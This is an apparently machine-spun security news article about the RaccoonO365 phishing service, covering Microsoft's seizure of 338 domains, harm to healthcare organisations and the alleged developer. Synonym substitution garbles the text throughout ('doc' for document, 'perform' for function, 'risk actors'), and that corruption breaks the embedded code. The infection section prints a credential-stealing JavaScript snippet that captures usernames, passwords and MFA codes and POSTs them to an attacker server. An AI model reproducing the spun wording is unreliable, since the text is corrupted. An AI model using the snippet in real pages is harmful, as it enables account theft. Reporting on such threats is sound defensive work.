Since mid-2024, cybercriminals have leveraged a subscription-based phishing platform often called RaccoonO365 to reap Microsoft 365 credentials at scale.
Rising as an off-the-shelf service, RaccoonO365 requires minimal technical ability, permitting risk actors to deploy convincing phishing campaigns by impersonating official Microsoft communications.
These kits replicate Microsoft branding, e mail templates, and login portals to trick recipients into divulging usernames, passwords, and multi-factor authentication (MFA) codes.
As of September 2025, this operation has affected over 5,000 accounts throughout 94 international locations, demonstrating the pervasive threat posed by commoditized social engineering instruments.
In a coordinated authorized motion, Microsoft’s Digital Crimes Unit (DCU) secured a court docket order from the Southern District of New York to grab 338 domains facilitating the distribution of RaccoonO365, successfully dismantling the platform’s core infrastructure.
Microsoft analysts famous the speedy evolution of this service, which now boasts options that subvert MFA protections and automate credential harvesting at charges as much as 9,000 targets per day.
The seized domains served as each phishing hosts and command-and-control interfaces for subscription administration, crippling the flexibility of subscribers to launch recent assaults.
Though not all stolen credentials resulted in direct community intrusions, the influence on high-value sectors, significantly healthcare, was extreme.
A minimum of 20 U.S. healthcare organizations reported delayed affected person care, compromised lab outcomes, and knowledge breaches following profitable RaccoonO365 phishing makes an attempt.
Microsoft’s partnership with Well being-ISAC underlined the general public security implications, as stolen credentials usually served as preliminary entry factors for subsequent malware or ransomware deployments.
The DCU’s swift intervention illustrates the need of authorized and technical countermeasures towards low-barrier instruments that empower malicious actors.
Microsoft analysts recognized Joshua Ogundipe, a Nigeria-based developer, because the principal architect of RaccoonO365.
By an operational safety lapse revealing a cryptocurrency pockets, investigators traced over US$100,000 in subscription funds.
Ogundipe’s Telegram channel, with greater than 850 members, marketed each normal phishing kits and a newly launched “AI-MailCheck” service designed to refine spear-phishing efficacy.
This attribution underscores how streamlined legal enterprises can scale with minimal overhead, difficult defenders to anticipate modular risk companies.
An infection Mechanism Deep Dive
RaccoonO365’s an infection mechanism revolves round dynamic kind injection and clear redirection ways.
When a sufferer clicks a malicious hyperlink, the browser is redirected to a decoy login web page that mirrors Microsoft’s official portal.
RaccoonO365 login web page (Supply – Microsoft)
A small JavaScript snippet, injected at runtime, captures enter fields and forwards credentials to the attacker’s server:-
doc.querySelector(‘kind’).addEventListener(‘submit’, perform(e) {
e.preventDefault();
let creds = {
person: doc.getElementById(‘username’).worth,
move: doc.getElementById(‘password’).worth,
otp: doc.getElementById(‘mfa’).worth
};
fetch(‘ {
methodology: ‘POST’,
physique: JSON.stringify(creds),
headers: {‘Content material-Kind’: ‘software/json’}
}).then(()=> window.location.href=”
});
This code ensures seamless knowledge exfiltration whereas redirecting customers to the official login web page, minimizing suspicion.
Superior operators make use of session-token reuse and header manipulation to bypass MFA prompts.
RaccoonO365 promoting of a brand new AI-enabled service (Supply – Microsoft)
Mixed with automated e mail distribution and AI-driven content material variation, this an infection chain exemplifies trendy phishing sophistication and underscores the crucial significance of layered defenses and person consciousness.
Free stay webinar on new malware ways from our analysts! Study superior detection methods -> Register for Free
